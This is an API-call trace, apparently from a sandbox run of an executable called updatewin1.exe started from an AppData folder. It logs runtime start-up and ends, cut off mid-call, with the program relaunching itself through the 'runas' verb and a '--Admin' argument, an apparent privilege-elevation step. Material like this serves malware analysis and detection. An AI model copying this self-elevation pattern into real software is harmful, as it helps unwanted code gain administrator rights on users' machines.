GetCurrentProcessId () returned 0xab4 [0180.306] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=30031690967) returned 1 [0180.306] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.306] GetLastError () returned 0x57 [0180.306] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.306] GetLastError () returned 0x57 [0180.306] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0180.306] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0180.306] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.306] GetLastError () returned 0x57 [0180.306] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0180.307] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0180.307] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.307] GetLastError () returned 0x57 [0180.307] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.307] GetLastError () returned 0x57 [0180.307] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0180.307] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0180.307] GetProcessHeap () returned 0x5c0000 [0180.307] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.307] GetLastError () returned 0x57 [0180.307] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0180.308] GetLastError () returned 0x57 [0180.308] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0180.308] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x364) returned 0x5ea9e8 [0180.308] SetLastError (dwErrCode=0x57) [0180.308] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xc00) returned 0x5ead58 [0180.310] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x617b811f, hStdError=0xfffffffe)) [0180.310] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0180.310] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0180.310] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0180.310] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" " [0180.310] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" " [0180.310] IsValidCodePage (CodePage=0x4e4) returned 1 [0180.310] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0180.310] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0180.310] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.310] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.310] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0180.310] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.310] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0180.310] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0180.310] GetLastError () returned 0x57 [0180.311] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0180.311] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0180.311] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0180.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÇ$\"aHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0180.311] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.311] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0180.311] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0180.311] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0180.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÇ$\"aHõ\x18", lpUsedDefaultChar=0x0) returned 256 [0180.311] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x80) returned 0x5ea0d0 [0180.311] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe")) returned 0x5f [0180.311] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xc8) returned 0x5ec160 [0180.311] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0180.311] GetLastError () returned 0x0 [0180.311] GetEnvironmentStringsW () returned 0x5ec230* [0180.311] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xaca) returned 0x5ecd08 [0180.311] FreeEnvironmentStringsW (penv=0x5ec230) returned 1 [0180.311] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x98) returned 0x5ec230 [0180.311] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3e) returned 0x5ed7f8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6c) returned 0x5ec2d0 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x6e) returned 0x5ec348 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x78) returned 0x5d1180 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x62) returned 0x5ec3c0 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5d52d0 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0x5ec430 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x28) returned 0x5ea158 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1a) returned 0x5ebd10 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x4a) returned 0x5ec480 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x72) returned 0x5d1200 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5d5308 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5d5340 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1c) returned 0x5ebd38 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0xd2) returned 0x5ec4d8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x7c) returned 0x5ec5b8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x36) returned 0x5ec640 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3a) returned 0x5ed840 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x90) returned 0x5ec680 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x24) returned 0x5ec718 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5d5378 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x36) returned 0x5ec748 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x48) returned 0x5ec788 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x52) returned 0x5ec7d8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3c) returned 0x5ed888 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x82) returned 0x5ec838 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2e) returned 0x5d53b0 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x1e) returned 0x5ebd60 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2c) returned 0x5d53e8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x54) returned 0x5ec8c8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x52) returned 0x5ec928 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x2a) returned 0x5d5420 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x3c) returned 0x5ed8d0 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x54) returned 0x5ec988 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x24) returned 0x5ec9e8 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x30) returned 0x5d5458 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x8c) returned 0x5eca18 [0180.312] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ecd08 | out: hHeap=0x5c0000) returned 1 [0180.312] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x8, Size=0x800) returned 0x5ecab0 [0180.313] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.313] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0180.313] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0180.313] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" " [0180.313] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe\" ", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x5ed2b8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" [0180.313] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xc0) returned 0x5ed388 [0180.313] lstrcpyW (in: lpString1=0x18e5a0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" [0180.313] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8") returned 1 [0180.313] lstrcpyW (in: lpString1=0x18eda0, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0180.313] ShellExecuteExW (in: pExecInfo=0x18e528*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin1.exe", 